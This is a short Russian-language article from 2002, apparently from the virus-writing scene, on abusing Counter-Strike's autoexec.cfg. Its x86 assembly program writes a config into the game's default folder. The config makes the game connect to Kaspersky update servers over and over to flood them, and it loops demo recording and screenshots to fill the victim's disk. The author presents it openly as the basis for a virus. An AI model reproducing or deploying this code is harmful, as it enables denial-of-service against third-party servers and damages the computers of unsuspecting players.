Я уже можно сказать очень давно играю в эту игру и однажды в голову мне пришла идея о том, что эту игру можно использовать в вирусных целях. :) Для информациии кто не знает про эту игрушку могу лишь сказать, что эта игра можно сказать самая распространенная игра в мире!

И вот что что можно полезного из нее извлечь, но все дело в том что мы будем использовать просто комманды консоли :)

  1. \connect - команда присоединяет нас к указанному серверу,(\port - номер порта для коннекта). Из этой комманды можно извлечь то что, при помощи этой комманды мы можем флудить сайты, путем постоянного коннекта.
  2. \record - При вызови этой комманды, она начинает записывать демо игры, это нам пригодится, если мы вдруг нужно будет кому-то засрать комп
  3. \screanshot - Делает скриншот, применение как у пункта №2
  4. \writecfg - Записывает конфиг игры в файл, применение пунктов № 2,3
  5. \exec - загрузка конфига

При запуске нашей игры, игрушка проверяет ноличие файла autoexec.cfg в в папке игры, если он есть то автоматически выполняются комманды, котолрые были записаны в нем.

Так вот можно написать вирус, который бы и использовал эту игру к примеру для флудинга апдейт сайтов АВП.

Вот пример маленький примерчик: Создает в директории c:\Sierra\counter-strike\cstrike\ файл autoexec.cfg (директория по умолчанию, у 99 процентов всех игорокв он именно такая)

!!Это просто пример!! Меняем порт на 25 и пробуем подключиться к сайтам. Далее начинает записываеть демку и делает скриншот, а после этого все повторяет сначала...

.386p
.model flat,STDCALL
        extrn ExitProcess:proc   
        extrn CreateFileA:proc
        extrn WriteFile:proc
        extrn CloseHandle:proc
.data
num_bytes  dd ?

;Директория по умолчанию:
filename db 'c:\Sierra\counter-strike\cstrike\autoexec.cfg',0 

; Наш конфиг:
reg:
 db '\port 25',13,10                                                 
 db '\connect http://downloads-us1.kaspersky-labs.com/updates',13,10 
 db '\connect http://updates1.kaspersky-labs.com/updates',13,10      
 db '\record configuration',13,10                                    
 db '\screenshot',13,10                                              
 db '\exec autoexec.cfg',13,10                                       
regs:
filesize equ regs - reg

.code
start:
        push 0
        push 00000080h
        push 2
        push 0
        push 1
        push 40000000h
        push offset filename
        call CreateFileA
        push EAX
        
        push 0
        push offset num_bytes
        push filesize
        push offset reg
        push EAX
        Call WriteFile

        Call CloseHandle

        push 0
        call ExitProcess
end start

Это все.!

10.08.02